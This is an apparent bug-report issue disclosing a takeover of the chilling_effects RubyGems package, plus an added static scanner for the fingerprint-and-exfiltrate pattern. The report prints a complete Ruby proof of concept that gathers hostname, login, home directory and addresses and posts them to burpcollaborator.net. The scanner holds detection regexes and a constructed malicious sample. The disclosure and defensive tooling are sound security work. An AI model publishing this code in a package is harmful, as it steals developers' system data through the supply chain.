Gem Package Takeover - `chilling effects`
ManojSharma1997 opened this issue
Hello benbalter,
I am writing to bring to your attention a significant security concern regarding a RubyGems package that I have recently discovered. I believe it poses a potential threat to the security of its users.
I found that the chilling_effects RubyGems package was available for takeover. Hence I have taken over this RubyGems package.
Exploit
If the team allows, I can upload the following malicious code.
require 'net/http'
require 'uri'
require 'json'
require 'socket'
require 'etc'   # Etc.getlogin needs this
# Read the manifest if present (the PoC as written targets ./package.json)
packageJSON = File.exist?('./package.json') ? JSON.parse(File.read('./package.json')) : nil
package = packageJSON ? packageJSON['name'] : nil
# Host and user fingerprint that gets exfiltrated
trackingData = {
  p: package,
  c: __dir__,
  hd: Dir.home,
  hn: Socket.gethostname,
  un: Etc.getlogin,
  dns: Socket.getaddrinfo(Socket.gethostname, nil, Socket::AF_INET).map { |addrinfo| addrinfo[3] },
  r: packageJSON ? packageJSON['__resolved'] : nil,
  v: packageJSON ? packageJSON['version'] : nil,
  pjson: packageJSON
}
# Form-encode the JSON payload (URI.encode_www_form is the standard-library equivalent of the non-standard Querystring.stringify)
postData = URI.encode_www_form(msg: trackingData.to_json)
url = URI.parse('https://burpcollaborator.net') # replace burpcollaborator.net with Interactsh or pipedream
http = Net::HTTP.new(url.host, url.port)
http.use_ssl = true
headers = {
  'Content-Type' => 'application/x-www-form-urlencoded',
  'Content-Length' => postData.bytesize.to_s
}
# Net::HTTP rejects an empty request path, so default to '/'
path = url.path.empty? ? '/' : url.path
response = http.post(path, postData, headers)
puts response.body
POC
https://rubygems.org/gems/chilling_effects
Impact
An attacker can take over the package, and when a developer tries this code, they will have malicious code injected into their system by trusting chilling_effects.
This will lead to Remote Code Execution.
Best Regards,
@predator_97
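The PoC above combines host fingerprinting (hostname, login, home directory, addresses) with an outbound HTTP request that runs as soon as the file is required. The following is an added example, not code from the issue author or from the chilling_effects gem: a small static scan you can run over an unpacked gem's files before installing it, flagging exactly that combination. The indicator regexes and the "top-level" heuristic are assumptions chosen to match the calls in the PoC; the two sample library files are constructed for the demo.

```ruby
# Added example (not from the issue author): a static pre-install scan for the
# fingerprint-and-exfiltrate pattern shown in the PoC above. Point it at the
# files of an unpacked gem (e.g. `gem fetch NAME` then `gem unpack NAME-*.gem`).
require 'set'

# Each entry: category => { indicator name => regex }. These regexes are an
# assumption chosen to match the calls used in the PoC; extend them as needed.
INDICATORS = {
  fingerprint: {
    'hostname'  => /Socket\.gethostname/,
    'login'     => /Etc\.getlogin|ENV\[['"](?:USER|USERNAME)['"]\]/,
    'home_dir'  => /Dir\.home|ENV\[['"]HOME['"]\]/,
    'addresses' => /Socket\.getaddrinfo|Socket\.ip_address_list/,
  },
  network: {
    'net_http'   => /Net::HTTP/,
    'open_uri'   => /\bURI\.open\b|\bopen-uri\b/,
    'raw_socket' => /TCPSocket\.new|UDPSocket\.new/,
  },
}.freeze

Finding = Struct.new(:category, :name, :line, :text, :top_level)

# Returns every indicator hit in one Ruby source string.
# `top_level` is a heuristic: an unindented line that is not a def/class/module/end
# executes as soon as the file is required, which is what lets the PoC fire at
# install or load time rather than when some method is called.
def scan_source(source)
  findings = []
  source.each_line.with_index(1) do |raw, lineno|
    line = raw.chomp
    next if line.strip.start_with?('#')
    top_level = line !~ /\A\s/ && line !~ /\A(?:def|class|module|end)\b/
    INDICATORS.each do |category, rules|
      rules.each do |name, re|
        findings << Finding.new(category, name, lineno, line.strip, top_level) if line =~ re
      end
    end
  end
  findings
end

# A file is flagged only when it both fingerprints the host AND talks to the
# network; either one alone is common in legitimate gems.
def suspicious?(source)
  cats = scan_source(source).map(&:category).to_set
  cats.include?(:fingerprint) && cats.include?(:network)
end

# Constructed samples (not real gem contents).
MALICIOUS_LIB = <<~RUBY
  require 'net/http'
  require 'socket'
  require 'etc'
  data = { hn: Socket.gethostname, un: Etc.getlogin, hd: Dir.home }
  Net::HTTP.post(URI('https://example.invalid/collect'), data.to_json)
RUBY

BENIGN_LIB = <<~RUBY
  require 'net/http'
  module ChillingEffects
    def self.fetch(url)
      Net::HTTP.get(URI(url))
    end
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  { 'malicious' => MALICIOUS_LIB, 'benign' => BENIGN_LIB }.each do |label, src|
    puts "#{label}: suspicious=#{suspicious?(src)}"
    scan_source(src).each do |f|
      puts "  L#{f.line} #{f.category}/#{f.name}#{' (top-level)' if f.top_level}: #{f.text}"
    end
  end
end
```

The scan is deliberately crude: it is a triage filter for a freshly republished gem, not a substitute for reading the source. Top-level hits deserve the most attention, since they run on `require`, and a gem whose previous release had none of these indicators suddenly gaining them is the takeover signal this issue describes.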